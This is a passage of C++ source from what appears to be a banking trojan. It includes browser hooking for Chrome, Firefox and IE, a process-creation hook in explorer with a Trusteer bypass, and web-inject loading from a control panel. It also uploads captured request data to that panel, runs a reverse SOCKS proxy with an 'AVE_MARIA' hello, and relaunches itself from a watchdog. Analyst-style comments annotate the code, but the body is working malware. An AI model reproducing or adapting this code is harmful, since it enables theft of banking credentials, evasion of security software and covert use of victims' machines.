|| !strReplaceBefore || !strReplaceAfter) 175 | return FALSE; 176 | 177 | char *startStrBeforeAfter; 178 | DWORD strBeforeAfterLen = WildCardStrStr(*str2replace, strBeforeAfter, &startStrBeforeAfter); 179 | if (!strBeforeAfterLen) 180 | return FALSE; 181 | 182 | DWORD str2replaceLen = Funcs::pLstrlenA(*str2replace); 183 | DWORD strReplaceBeforeLen = Funcs::pLstrlenA(strReplaceBefore); 184 | DWORD strReplaceAfterLen = Funcs::pLstrlenA(strReplaceAfter); 185 | 186 | char *newStr = (char *) Alloc(str2replaceLen + strReplaceBeforeLen + strReplaceAfterLen + 1); 187 | if (!newStr) 188 | return FALSE; 189 | Funcs::pMemset(newStr, 0, str2replaceLen + strReplaceBeforeLen + strReplaceAfterLen + 1); 190 | 191 | /* copy order: original prefix, inserted "before" text, the matched region, inserted "after" text, original suffix */ DWORD offset = startStrBeforeAfter - *str2replace; 192 | Funcs::pMemcpy(newStr, *str2replace, offset); 193 | 194 | Funcs::pMemcpy(newStr + offset, strReplaceBefore, strReplaceBeforeLen); 195 | offset += strReplaceBeforeLen; 196 | 197 | Funcs::pMemcpy(newStr + offset, startStrBeforeAfter, strBeforeAfterLen); 198 | offset += strBeforeAfterLen; 199 | 200 | Funcs::pMemcpy(newStr + offset, strReplaceAfter, strReplaceAfterLen); 201 | offset += strReplaceAfterLen; 202 | 203 | Funcs::pMemcpy(newStr + offset, startStrBeforeAfter + strBeforeAfterLen, 204 | str2replaceLen - (startStrBeforeAfter - *str2replace) - strBeforeAfterLen); 205 
| 206 | Funcs::pFree(*str2replace); 207 | *str2replace = newStr; 208 | return TRUE; 209 | } 210 | 211 | /* Returns an allocated copy of the text between the first two spaces of the header block; presumably the request target of an HTTP request line. */ inline char *GetPath(char *headers) 212 | { 213 | return FindStrSandwich(headers, " ", " "); 214 | } 215 | 216 | /* Returns an allocated copy of the text between Strs::bu3 and Strs::winNewLine; presumably the Host header value (Strs::bu3 is not shown in this file). */ inline char *GetHost(char *headers) 217 | { 218 | return FindStrSandwich(headers, Strs::bu3, Strs::winNewLine); 219 | } 220 | 221 | char *GetUrlHeaders(char *headers, BOOL *inject) 222 | { /* Builds a URL from the host and path extracted from headers and returns it (NULL if either part is missing). The temporary host and path copies are freed here; the returned string is left for the caller to free. */ 223 | char *host = NULL, *path = NULL, *url = NULL; 224 | if((host = GetHost(headers))) 225 | { 226 | if((path = GetPath(headers))) 227 | url = GetUrlHostPath(host, path, inject); 228 | } 229 | Funcs::pFree(host); 230 | Funcs::pFree(path); 231 | return url; 232 | } 233 | 234 | char *GetUrlHostPath(char *host, char *path, BOOL *inject) 235 | { /* Sets *inject to whether GetWebInject returns an entry for host, then returns an allocated string made of Strs::bu4 + host + path, or NULL if allocation fails. NOTE(review): the buffer allows 20 bytes beyond host and path, which must cover Strs::bu4 plus the terminator; Strs::bu4 is not shown here. */ 236 | *inject = GetWebInject(host, NULL) != NULL; 237 | char *url = NULL; 238 | if(url = (char *) Alloc(lstrlenA(host) + lstrlenA(path) + 20)) 239 | { 240 | Funcs::pLstrcpyA(url, Strs::bu4); 241 | Funcs::pLstrcatA(url, host); 242 | Funcs::pLstrcatA(url, path); 243 | } 244 | return url; 245 | } 246 | 247 | static DWORD WINAPI UploadThread(LPVOID lpParam) 248 | { /* Thread entry: passes the buffer received in lpParam to PanelRequest when it is non-empty, then frees both the response and the buffer. */ 249 | char *postData = (char *) lpParam; 250 | if(Funcs::pLstrlenA(postData) > 0) 251 | { 252 | char *r = PanelRequest(postData, NULL); 253 | Funcs::pFree(r); 254 | } 255 | Funcs::pFree(postData); 256 | return 0; 257 | } 258 | 259 | void UploadLog(char *software, char *url, char *data, BOOL inject) 260 | { /* Skips URLs that UrlIsBlacklisted rejects and empty data; otherwise formats software, url and inject with Strs::bu5, appends data, and hands the buffer to a new UploadThread, which frees it. Callers are elsewhere; presumably data is request content collected by the browser hooks, which makes this the point where it leaves the process toward the panel. NOTE(review): the buffer is sized as the three string lengths + 10, so it fits only if Strs::bu5 expands to at most 9 bytes beyond software and url, which cannot be confirmed from this file; the handle returned by pCreateThread is not closed. */ 261 | if(UrlIsBlacklisted(url)) 262 | return; 263 | if(Funcs::pLstrlenA(data) == 0) 264 | return; 265 | char *postData = (char *) Alloc(Funcs::pLstrlenA(software) + Funcs::pLstrlenA(url) + Funcs::pLstrlenA(data) + 10); 266 | if(postData) 267 | { 268 | Funcs::pWsprintfA(postData, Strs::bu5, software, url, inject); 269 | Funcs::pLstrcatA(postData, data); 270 | Funcs::pCreateThread(NULL, 0, UploadThread, postData, 0, NULL); 271 | } 272 | } -------------------------------------------------------------------------------- /Bot/BrowserUtils.h: 
-------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../Common.h" 3 | 4 | #define MAX_REQUESTS 256 5 | 6 | char *FindStrSandwich(char *buf, char *leftPart, char *rightPart); 7 | DWORD WildCardStrCmp(char *str, char *str2, BOOL ignoreCase, BOOL checkEnd); 8 | DWORD WildCardStrStr(char *str, char *subStr, char **start); 9 | BOOL ReplaceHeader(char **headers, char *name, char *value); 10 | BOOL ReplaceBeforeAfter(char **str2replace, char *strBeforeAfter, char *strReplaceBefore, char *strReplaceAfter); 11 | inline char *GetPath(char *headers); 12 | inline char *GetHost(char *headers); 13 | char *GetUrlHeaders(char *headers, BOOL *inject); 14 | char *GetUrlHostPath(char *host, char *path, BOOL *inject); 15 | void UploadLog(char *software, char *url, char *data, BOOL inject); -------------------------------------------------------------------------------- /Bot/Explorer.cpp: -------------------------------------------------------------------------------- 1 | #include "..\Common.h" 2 | #include "..\MinHook\include\MinHook.h" 3 | 4 | /* Pointer through which the original, un-hooked function is called; it is filled in by the MH_CreateHookApi calls in HookExplorer. */ static DWORD (WINAPI *Real_CreateProcessInternal) 5 | ( 6 | DWORD unknown1, 7 | PWCHAR lpApplicationName, 8 | PWCHAR lpCommandLine, 9 | LPSECURITY_ATTRIBUTES lpProcessAttributes, 10 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 11 | BOOL bInheritHandles, 12 | DWORD dwCreationFlags, 13 | LPVOID lpEnvironment, 14 | PWCHAR lpCurrentDirectory, 15 | LPSTARTUPINFO lpStartupInfo, 16 | LPPROCESS_INFORMATION lpProcessInformation, 17 | DWORD unknown2 18 | ); 19 | 20 | static DWORD WINAPI My_CreateProcessInternal( 21 | DWORD unknown1, 22 | PWCHAR lpApplicationName, 23 | PWCHAR lpCommandLine, 24 | LPSECURITY_ATTRIBUTES lpProcessAttributes, 25 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 26 | BOOL bInheritHandles, 27 | DWORD dwCreationFlags, 28 | LPVOID lpEnvironment, 29 | PWCHAR lpCurrentDirectory, 30 | LPSTARTUPINFO lpStartupInfo, 31 | LPPROCESS_INFORMATION lpProcessInformation, 32 | DWORD unknown2) 
33 | { /* Hook body that runs for every process the hooked host creates. It converts the application name and command line to UTF-8, tests whether a path built from the x86 Program Files folder plus Strs::trusteer exists, and compares the executable name with the chrome, firefox and iexplore names held in Strs. Those three set inject; chrome also gets extra command-line text (Strs::exp17, value not shown) and clears the trusteer flag. When the flag is still set, CREATE_SUSPENDED is added to the creation flags; as written that also applies to non-browser launches, which then leave through `goto exit` with no resume visible in this function. For an empty or verclsid executable name the original function is not called and 0 is returned. NOTE(review): the 32769-byte myCommandLine allocation is used without a NULL check and is only initialised when lpCommandLineA is non-NULL. */ 34 | char *lpCommandLineA = Utf16toUtf8(lpCommandLine); 35 | char *lpApplicationNameA = Utf16toUtf8(lpApplicationName); 36 | char *myCommandLine = (char *) Alloc(32768 + 1); 37 | char *exeName = Funcs::pPathFindFileNameA(lpApplicationNameA); 38 | 39 | if(lpCommandLineA) 40 | Funcs::pLstrcpyA(myCommandLine, lpCommandLineA); 41 | 42 | BOOL trusteer = FALSE; 43 | char programX86path[MAX_PATH] = { 0 }; 44 | Funcs::pSHGetFolderPathA(NULL, CSIDL_PROGRAM_FILESX86, NULL, 0, programX86path); 45 | Funcs::pLstrcatA(programX86path, Strs::fileDiv); 46 | Funcs::pLstrcatA(programX86path, Strs::trusteer); 47 | if(Funcs::pPathFileExistsA(programX86path)) 48 | trusteer = TRUE; 49 | 50 | BOOL inject = FALSE; 51 | BOOL vistaHack = FALSE; 52 | if(Funcs::pLstrcmpiA(exeName, Strs::chromeExe) == 0) 53 | { 54 | Funcs::pLstrcatA(myCommandLine, Strs::exp17); 55 | inject = TRUE; 56 | trusteer = FALSE; 57 | } 58 | else if(Funcs::pLstrcmpiA(exeName, Strs::firefoxExe) == 0) 59 | { 60 | SetFirefoxPrefs(); 61 | inject = TRUE; 62 | } 63 | else if(Funcs::pLstrcmpiA(exeName, Strs::iexploreExe) == 0) 64 | { 65 | DisableMultiProcessesAndProtectedModeIe(); 66 | inject = TRUE; 67 | } 68 | else if(Funcs::pLstrcmpiA(exeName, "") == 0 || 69 | Funcs::pLstrcmpiA(exeName, Strs::verclsidExe) == 0) 70 | { 71 | vistaHack = TRUE; //don't ask me why 72 | } 73 | 74 | if(trusteer) 75 | dwCreationFlags = dwCreationFlags | CREATE_SUSPENDED; 76 | 77 | wchar_t *myCommandLineW = Utf8toUtf16(myCommandLine); 78 | 79 | DWORD ret = 0; 80 | if(!vistaHack) 81 | { 82 | ret = Real_CreateProcessInternal(unknown1, 83 | lpApplicationName, 84 | myCommandLineW, 85 | lpProcessAttributes, 86 | lpThreadAttributes, 87 | bInheritHandles, 88 | dwCreationFlags, 89 | lpEnvironment, 90 | lpCurrentDirectory, 91 | lpStartupInfo, 92 | lpProcessInformation, 93 | unknown2); 94 | } 95 | 96 | if(!inject || !ret) 97 | goto exit; 98 | 99 | if(trusteer) 100 | { 101 | //if trusteer is x64 explorer will be too so we can inject directly 102 | BOOL 
x64 = IsProcessX64(lpProcessInformation->hProcess); 103 | if(x64) 104 | { /* 64-bit child: BypassTrusteer (defined elsewhere) is called and its return value replaces the reported process id */ 105 | lpProcessInformation->dwProcessId = BypassTrusteer(lpProcessInformation, lpApplicationNameA, lpCommandLineA); 106 | trusteer = FALSE; 107 | } 108 | else /* 32-bit child: the suspended process is terminated; its path and command line are sent over the pipe below, presumably so the receiving component can start it itself */ 109 | Funcs::pTerminateProcess(lpProcessInformation->hProcess, 0); 110 | } 111 | 112 | /* Reports the launch to another component over a named pipe whose name is formatted from Strs::pipeName and the bot id: first the process id, then the trusteer flag, and, when that flag is still set, the length-prefixed application path and command line. NOTE(review): the pCreateFileA result is not checked before the writes. */ char pipeName[MAX_PATH] = { 0 }; 113 | char botId[BOT_ID_LEN] = { 0 }; 114 | GetBotId(botId); 115 | Funcs::pWsprintfA(pipeName, Strs::pipeName, botId); 116 | HANDLE hPipe = Funcs::pCreateFileA 117 | ( 118 | pipeName, 119 | GENERIC_WRITE | GENERIC_READ, 120 | FILE_SHARE_READ | FILE_SHARE_WRITE, 121 | NULL, 122 | OPEN_EXISTING, 123 | FILE_ATTRIBUTE_NORMAL, 124 | NULL 125 | ); 126 | DWORD writtenRead; 127 | 128 | Funcs::pWriteFile(hPipe, &lpProcessInformation->dwProcessId, sizeof(lpProcessInformation->dwProcessId), &writtenRead, NULL); 129 | Funcs::pWriteFile(hPipe, &trusteer, sizeof(trusteer), &writtenRead, NULL); 130 | if(trusteer) 131 | { 132 | int applicationNameLen = Funcs::pLstrlenA(lpApplicationNameA); 133 | Funcs::pWriteFile(hPipe, &applicationNameLen, sizeof(applicationNameLen), &writtenRead, NULL); 134 | Funcs::pWriteFile(hPipe, lpApplicationNameA, applicationNameLen, &writtenRead, NULL); 135 | 136 | int commandLineA = Funcs::pLstrlenA(lpCommandLineA); 137 | Funcs::pWriteFile(hPipe, &commandLineA, sizeof(commandLineA), &writtenRead, NULL); 138 | Funcs::pWriteFile(hPipe, lpCommandLineA, commandLineA, &writtenRead, NULL); 139 | } 140 | Funcs::pCloseHandle(hPipe); 141 | 142 | exit: 143 | Funcs::pFree(lpCommandLineA); 144 | Funcs::pFree(lpApplicationNameA); 145 | Funcs::pFree(myCommandLine); 146 | Funcs::pFree(myCommandLineW); 147 | return ret; 148 | } 149 | 150 | /* Bot id used below as the name of the mutex that is polled and waited on. */ static char botId[BOT_ID_LEN] = { 0 }; 151 | 152 | /* Waits 500 ms, removes all MinHook hooks, then starts the executable at the path returned by GetInstallPath and closes the new process and thread handles. */ static void Restart() 153 | { 154 | Funcs::pSleep(500); 155 | 156 | MH_DisableHook(MH_ALL_HOOKS); 157 | MH_Uninitialize(); 158 | 159 | char installPath[MAX_PATH] = { 0 }; 160 | GetInstallPath(installPath); 161 | 162 | STARTUPINFOA 
startupInfo = { 0 }; 163 | PROCESS_INFORMATION processInfo = { 0 }; 164 | startupInfo.cb = sizeof(startupInfo); 165 | Funcs::pCreateProcessA(installPath, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo); 166 | Funcs::pCloseHandle(processInfo.hProcess); 167 | Funcs::pCloseHandle(processInfo.hThread); 168 | } 169 | 170 | /* Watchdog thread: every 10 s tries to open the mutex named after the bot id; once it can no longer be opened it calls Restart and exits. The handle is closed before the saved value is tested. */ static DWORD WINAPI RestartThread(LPVOID lpParam) 171 | { 172 | for(;;) 173 | { 174 | HANDLE hMutex = OpenMutexA(SYNCHRONIZE, FALSE, botId); 175 | Funcs::pCloseHandle(hMutex); 176 | if(!hMutex) 177 | { 178 | Restart(); 179 | return 0; 180 | } 181 | Funcs::pSleep(10000); 182 | } 183 | return 0; 184 | } 185 | 186 | /* Installs My_CreateProcessInternal over the export named by Strs::exp18 in the modules named by Strs::wKernel32 and Strs::wKernelBase, starts RestartThread, then blocks on the bot-id mutex (presumably held by the main bot process) and calls Restart when the wait returns. For analysts: the visible artefacts are an inline hook on the process-creation path of the host process, a mutex and a named pipe whose names derive from the bot id, and a relaunch of the install path when the mutex disappears. NOTE(review): both MH_CreateHookApi calls store their trampoline in the same Real_CreateProcessInternal pointer, so the second overwrites the first; MinHook return codes, the OpenMutexA result and the CreateThread handle are not checked or closed. */ void HookExplorer() 187 | { 188 | MH_Initialize(); 189 | MH_CreateHookApi(Strs::wKernel32, Strs::exp18, My_CreateProcessInternal, (LPVOID *) &Real_CreateProcessInternal); 190 | MH_CreateHookApi(Strs::wKernelBase, Strs::exp18, My_CreateProcessInternal, (LPVOID *) &Real_CreateProcessInternal); 191 | MH_EnableHook(MH_ALL_HOOKS); 192 | 193 | GetBotId(botId); 194 | CreateThread(NULL, 0, RestartThread, NULL, 0, NULL); 195 | HANDLE hMutex = OpenMutexA(SYNCHRONIZE, FALSE, botId); 196 | Funcs::pWaitForSingleObject(hMutex, INFINITE); 197 | Funcs::pCloseHandle(hMutex); 198 | Restart(); 199 | } -------------------------------------------------------------------------------- /Bot/Explorer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | void HookExplorer(); -------------------------------------------------------------------------------- /Bot/FirefoxChrome.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | #include "WebInjects.h" 4 | #pragma once 5 | void HookFirefox(); 6 | void HookChrome(); 7 | 8 | -------------------------------------------------------------------------------- /Bot/HiddenDesktop.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 
#include "..\Common.h" 3 | 4 | void StartHiddenDesktop(char *host, int port); -------------------------------------------------------------------------------- /Bot/IE.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | void HookIe(); -------------------------------------------------------------------------------- /Bot/Main.cpp: -------------------------------------------------------------------------------- 1 | #pragma comment(linker, "/ENTRY:DllMain") 2 | 3 | extern "C" int _fltused = 0; 4 | 5 | #include "..\common.h" 6 | #include "..\wow64ext\wow64ext.h" 7 | #include "FirefoxChrome.h" 8 | #include "IE.h" 9 | #include "Explorer.h" 10 | #include "Bot.h" 11 | 12 | /* EnumWindows callback: returns FALSE (stop enumerating) at the first top-level window owned by the current process, TRUE otherwise. */ static BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) 13 | { 14 | DWORD pid; 15 | Funcs::pGetWindowThreadProcessId(hwnd, &pid); 16 | if(pid == Funcs::pGetCurrentProcessId()) 17 | return FALSE; 18 | return TRUE; 19 | } 20 | 21 | /* Polls every 100 ms and returns once EnumWindows reports FALSE, which happens when the callback above found a window belonging to this process. */ static void WaitForWindow() 22 | { 23 | for(;;) 24 | { 25 | if(!Funcs::pEnumWindows(EnumWindowsProc, NULL)) 26 | return; 27 | Sleep(100); 28 | } 29 | } 30 | 31 | /* Role dispatch for the same DLL loaded into different hosts, chosen by the host executable's file name: dllhost -> StartBot() (compiled in for 32-bit builds only), explorer -> HookExplorer(), firefox / chrome / iexplore -> wait for the browser window, initialise panel requests, install the browser hooks. Any other host does nothing. mutexName and botId are declared here but not used. */ static DWORD WINAPI EntryThread(LPVOID lpParam) 32 | { 33 | char exePath[MAX_PATH] = { 0 }; 34 | char *exeName; 35 | Funcs::pGetModuleFileNameA(NULL, exePath, MAX_PATH); 36 | exeName = Funcs::pPathFindFileNameA(exePath); 37 | 38 | char mutexName[MAX_PATH] = { 0 }; 39 | char botId[BOT_ID_LEN] = { 0 }; 40 | 41 | 42 | if(Funcs::pLstrcmpiA(exeName, Strs::dllhostExe) == 0) 43 | { 44 | #if !_WIN64 45 | InitPanelRequest(); 46 | InitWow64ext(); 47 | StartBot(); 48 | #endif 49 | } 50 | else if(Funcs::pLstrcmpiA(exeName, Strs::explorerExe) == 0) 51 | HookExplorer(); 52 | else if(Funcs::pLstrcmpiA(exeName, Strs::firefoxExe) == 0) 53 | { 54 | WaitForWindow(); 55 | InitPanelRequest(); 56 | HookFirefox(); 57 | } 58 | else if(Funcs::pLstrcmpiA(exeName, Strs::chromeExe) == 0) 59 | { 60 | WaitForWindow(); 61 | InitPanelRequest(); 62 | HookChrome(); 63 | } 64 | else
if(Funcs::pLstrcmpiA(exeName, Strs::iexploreExe) == 0) 65 | { 66 | WaitForWindow(); 67 | InitPanelRequest(); 68 | HookIe(); 69 | } 70 | return 0; 71 | } 72 | 73 | /* Image entry point (set with the /ENTRY:DllMain linker pragma at the top of this file). On process attach it calls InitApi() and starts EntryThread; other notifications are ignored. Always returns TRUE. */ BOOL WINAPI DllMain 74 | ( 75 | HINSTANCE hModule, 76 | DWORD dwReason, 77 | LPVOID lpArgs 78 | ) 79 | { 80 | switch(dwReason) 81 | { 82 | case DLL_PROCESS_ATTACH: 83 | { 84 | InitApi(); 85 | Funcs::pCreateThread(NULL, 0, EntryThread, NULL, 0, NULL); 86 | break; 87 | } 88 | } 89 | return TRUE; 90 | } -------------------------------------------------------------------------------- /Bot/Socks.cpp: -------------------------------------------------------------------------------- 1 | #include "Socks.h" 2 | 3 | #define TCP_STREAM_CON 0x01 4 | #define REQUEST_GRANTED 0x5A 5 | #define REQUEST_REJECTED 0x5B 6 | 7 | #define GetByteInt(i, n) (i >> (8 * n)) & 0xff 8 | 9 | /* Hello sent by ClientThread right after connecting: the ASCII bytes "AVE_MARIA" followed by 0x01, ten bytes in total. Being a fixed sequence at the start of the control connection, it can serve as a network signature. */ static const BYTE gc_magik[] = { 'A', 'V', 'E', '_', 'M', 'A', 'R', 'I', 'A', 1 }; 10 | 11 | /* Server address shared between the control thread and the per-connection threads; ClientThread overwrites port with each value it receives. */ struct ClientThreadInfo 12 | { 13 | CHAR host[MAX_PATH]; 14 | INT port; 15 | }; 16 | 17 | /* Resolves host with gethostbyname and opens a TCP connection to host:port. Returns the connected socket, or NULL on any failure. */ static SOCKET ConnectServer(CHAR *host, USHORT port) 18 | { 19 | SOCKET s; 20 | WSADATA wsa; 21 | SOCKADDR_IN addr; 22 | if(!Funcs::pWSAStartup(MAKEWORD(2, 2), &wsa)) 23 | { 24 | if((s = Funcs::pSocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) 25 | { 26 | hostent *he = Funcs::pGethostbyname(host); 27 | Funcs::pMemcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); 28 | 29 | addr.sin_family = AF_INET; 30 | addr.sin_port = Funcs::pHtons(port); 31 | 32 | if(!Funcs::pConnect(s, (sockaddr *) &addr, sizeof(addr))) 33 | return s; 34 | } 35 | } 36 | return NULL; 37 | } 38 | 39 | /* One relay step in a single direction: if FIONREAD reports pending bytes on s_recv, reads up to 2048 of them and forwards them to s_send; otherwise sleeps 1 ms. Returns FALSE when ioctlsocket fails or when the recv / send result compares <= 0, TRUE otherwise. */ static BOOL QueryProxy(SOCKET s_recv, SOCKET s_send) 40 | { 41 | UINT bytes = 0; 42 | if(Funcs::pIoctlsocket(s_recv, FIONREAD, (u_long *) &bytes) == SOCKET_ERROR) 43 | return FALSE; 44 | 45 | if(bytes) 46 | { 47 | char buffer[2048] = { 0 }; 48 | if((bytes = Funcs::pRecv(s_recv, buffer, sizeof(buffer), 0)) <= 0) 49 | return FALSE; 50 | if(Funcs::pSend(s_send, buffer, bytes, 0) <= 0) 51 | return
FALSE; 52 | } 53 | else 54 | Funcs::pSleep(1); 55 | return TRUE; 56 | } 57 | 58 | /* Sends an 8-byte reply one byte at a time: 0x00, the status byte, then six zero bytes. This matches the SOCKS4 reply layout, and 0x5A / 0x5B are the SOCKS4 granted / rejected codes. Returns FALSE as soon as a send fails. */ static BOOL SendResponse(SOCKET s, BYTE status) 59 | { 60 | INT j; BYTE i = 0; 61 | 62 | if(Funcs::pSend(s, (PCHAR) &i, sizeof(i), 0) <= 0) 63 | return FALSE; 64 | 65 | i = status; 66 | if(Funcs::pSend(s, (PCHAR) &i, sizeof(i), 0) <= 0) 67 | return FALSE; 68 | 69 | i = 0; 70 | for (j = 0; j < 6; ++j) 71 | { 72 | if(Funcs::pSend(s, (PCHAR) &i, sizeof(i), 0) <= 0) 73 | return FALSE; 74 | } 75 | return TRUE; 76 | } 77 | 78 | /* Serves one proxied connection. The infected host dials OUT to info->host on info->port (a reverse proxy: no listening socket is opened locally), reads a SOCKS4-style request from the server (1-byte version, 1-byte command, 2-byte port in network order, 4-byte IPv4 address, then the user-id field), connects to the requested address and relays bytes in both directions until either side stops. Only command TCP_STREAM_CON (0x01) is accepted; anything else gets REQUEST_REJECTED. On the wire this appears as outbound connections from the victim to the server paired with outbound connections to arbitrary IPv4 targets. */ static UINT WINAPI ClientConnectionThread(ClientThreadInfo *info) 79 | { 80 | DWORD ip, i; 81 | USHORT port; 82 | BYTE version = 0, commandType = 0; 83 | 84 | SOCKET socksSocket = ConnectServer(info->host, info->port); 85 | if(socksSocket == INVALID_SOCKET) 86 | goto exit; 87 | 88 | if(Funcs::pRecv(socksSocket, (CHAR *) &version, sizeof(version), 0) <= 0) 89 | goto exit; 90 | 91 | if(Funcs::pRecv(socksSocket, (CHAR *) &commandType, sizeof(commandType), 0) <= 0) 92 | goto exit; 93 | 94 | if(Funcs::pRecv(socksSocket, (CHAR *) &port, sizeof(port), 0) <= 0) 95 | goto exit; 96 | 97 | port = Funcs::pNtohs(port); 98 | if(Funcs::pRecv(socksSocket, (CHAR *) &ip, sizeof(ip), 0) <= 0) 99 | goto exit; 100 | 101 | CHAR ipStr[16] = { 0 }; 102 | CHAR userId[255] = { 0 }; 103 | Funcs::pWsprintfA(ipStr, "%u.%u.%u.%u", GetByteInt(ip, 0), GetByteInt(ip, 1), GetByteInt(ip, 2), GetByteInt(ip, 3)); 104 | 105 | for(i = 0; ; ++i) 106 | { 107 | if(sizeof(userId) <= i) 108 | goto exit; 109 | if(Funcs::pRecv(socksSocket, (CHAR *) &userId, sizeof(userId), 0) <= 0) 110 | goto exit; 111 | if (!userId[i]) break; 112 | } 113 | 114 | if(commandType != TCP_STREAM_CON) 115 | { 116 | SendResponse(socksSocket, REQUEST_REJECTED); 117 | goto exit; 118 | } 119 | 120 | SOCKET proxySocket = ConnectServer(ipStr, port); 121 | if(proxySocket == INVALID_SOCKET) 122 | goto exit; 123 | 124 | if(SendResponse(socksSocket, REQUEST_GRANTED) <= 0) 125 | goto exit; 126 | 127 | for(;;) 128 | { 129 |
if(!QueryProxy(proxySocket, socksSocket)) 130 | goto exit; 131 | if(!QueryProxy(socksSocket, proxySocket)) 132 | goto exit; 133 | } 134 | 135 | exit: 136 | Funcs::pClosesocket(socksSocket); 137 | return 0; 138 | } 139 | 140 | /* Control channel: connects to the server, sends gc_magik, then loops reading 4-byte port numbers. Each received port is stored in info->port and a ClientConnectionThread is started with the same info pointer. When the connection fails, info is freed and the thread exits. */ static UINT WINAPI ClientThread(ClientThreadInfo *info) 141 | { 142 | SOCKET s = ConnectServer(info->host, info->port); 143 | if(s == INVALID_SOCKET) 144 | goto exit; 145 | 146 | if(Funcs::pSend(s, (CHAR *) gc_magik, sizeof(gc_magik), 0) <= 0) 147 | goto exit; 148 | 149 | for(;;) 150 | { 151 | INT port = 0; 152 | if(Funcs::pRecv(s, (CHAR *) &port, sizeof(port), 0) <= 0) 153 | goto exit; 154 | info->port = port; 155 | Funcs::pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) ClientConnectionThread, (VOID *) info, 0, 0); 156 | } 157 | exit: 158 | Funcs::pFree(info); 159 | return ERROR; 160 | } 161 | 162 | /* Public entry of the proxy module: copies host and port into a heap-allocated ClientThreadInfo and starts ClientThread on it. Returns TRUE once the thread has been started, FALSE if the allocation failed or host is NULL. */ BOOL StartSocksClient(CHAR *host, INT port) 163 | { 164 | ClientThreadInfo *info = (ClientThreadInfo *) Alloc(sizeof(*info)); 165 | if(info) 166 | { 167 | if(host) 168 | { 169 | Funcs::pLstrcpyA(info->host, host); 170 | info->port = port; 171 | 172 | Funcs::pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) ClientThread, (VOID *) info, 0, 0); 173 | return TRUE; 174 | } 175 | } 176 | Funcs::pFree(info); 177 | return FALSE; 178 | } -------------------------------------------------------------------------------- /Bot/Socks.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | 4 | BOOL StartSocksClient(CHAR *host, INT port); -------------------------------------------------------------------------------- /Bot/WebInjects.cpp: -------------------------------------------------------------------------------- 1 | #include "WebInjects.h" 2 | #include "BrowserUtils.h" 3 | 4 | /* Parsed inject configuration and a flag that is set once it has loaded; both are file-scope and shared by every function in this file. */ static AiJson *json = NULL; 5 | static BOOL loaded = FALSE; 6 | 7 | //todo: obfuscate strings 8 | 9 | /* Downloads the web-inject configuration from the panel (request string Strs::injectsRequest) and parses it as JSON; the root must be an object. On any failure it frees the response, sleeps POLL milliseconds and calls itself again, so it only returns after a successful load. */ void LoadWebInjects() 10 | { 11 | if(loaded) 12 | return; 13 | char request[32] = { 0 }; 14 |
Funcs::pLstrcpyA(request, Strs::injectsRequest); 15 | char *jsonStr = PanelRequest(request, NULL); 16 | /* the response is accepted only if it parses, reports AI_JSON_E_OK and has an object at the root */ if(!(json = AiJsonParse(jsonStr))) 17 | goto err; 18 | if(json->error != AI_JSON_E_OK) 19 | goto err; 20 | if(json->root.type != AI_JSON_OBJECT) 21 | goto err; 22 | loaded = TRUE; 23 | return; 24 | err: 25 | /* failure path: release, wait POLL ms, then retry by calling this function again */ Funcs::pFree(jsonStr); 26 | AiJsonDestroy(json); 27 | Funcs::pSleep(POLL); 28 | LoadWebInjects(); 29 | } 30 | 31 | /* Looks up the top-level key `name` in the parsed configuration and returns the first node of its array, or NULL when the key is missing or is not an array. Reads the file-scope json pointer, so callers check `loaded` first. */ static AiListNode *GetFirstNode(char *name) 32 | { 33 | AiList *object = ((AiList *) json->root.data.object); 34 | AiJsonValue *currValue = AiJsonGetValueObject(object, name); 35 | if(!currValue) 36 | return NULL; 37 | 38 | if(currValue->type != AI_JSON_ARRAY) 39 | return NULL; 40 | 41 | return currValue->data.array->first; 42 | } 43 | 44 | /* Returns TRUE when url matches any string mask in the "fg_blacklist" array, compared with WildCardStrCmp with both of its BOOL arguments set to TRUE (ignoreCase and checkEnd in the prototype). Non-string entries are skipped. Returns NULL (i.e. FALSE) while the configuration is not loaded. */ BOOL UrlIsBlacklisted(char *url) 45 | { 46 | if(!loaded) 47 | return NULL; 48 | 49 | AiListNode *curr = GetFirstNode("fg_blacklist"); 50 | while(curr) 51 | { 52 | AiJsonValue *blacklistedUrlMask = (AiJsonValue *) curr->data; 53 | if(blacklistedUrlMask->type != AI_JSON_STRING) 54 | goto next; 55 | 56 | if(WildCardStrCmp(blacklistedUrlMask->data.string, url, TRUE, TRUE)) 57 | return TRUE; 58 | next: 59 | curr = curr->next; 60 | } 61 | return FALSE; 62 | } 63 | 64 | /* Walks the "injects" array and returns the "content" array of the first entry whose "host" and "path" wildcard masks match the arguments; a NULL host or NULL path matches every entry. Entries that are not objects, lack a string "host" or "path", or have a missing or empty "content" array are skipped. Returns NULL when nothing matches or the configuration is not loaded. The key names used in this file ("fg_blacklist", "injects", "host", "path", "content") are plain string literals here, which makes them usable for static matching unless a later build obfuscates them. */ AiList *GetWebInject(char *host, char *path) 65 | { 66 | if(!loaded) 67 | return NULL; 68 | 69 | AiListNode *curr = GetFirstNode("injects"); 70 | 71 | while(curr) 72 | { 73 | AiJsonValue *object = (AiJsonValue *) curr->data; 74 | if(object->type != AI_JSON_OBJECT) 75 | goto next; 76 | 77 | AiJsonValue *url = AiJsonGetValueObject(object->data.object, "host"); 78 | if(!url || url->type != AI_JSON_STRING) 79 | goto next; 80 | 81 | AiJsonValue *uri = AiJsonGetValueObject(object->data.object, "path"); 82 | if(!uri || uri->type != AI_JSON_STRING) 83 | goto next; 84 | 85 | AiJsonValue *code = AiJsonGetValueObject(object->data.object, "content"); 86 | if(!code || code->type != AI_JSON_ARRAY || !code->data.array->len) 87 | goto next; 88 | 89 | if((!host ||
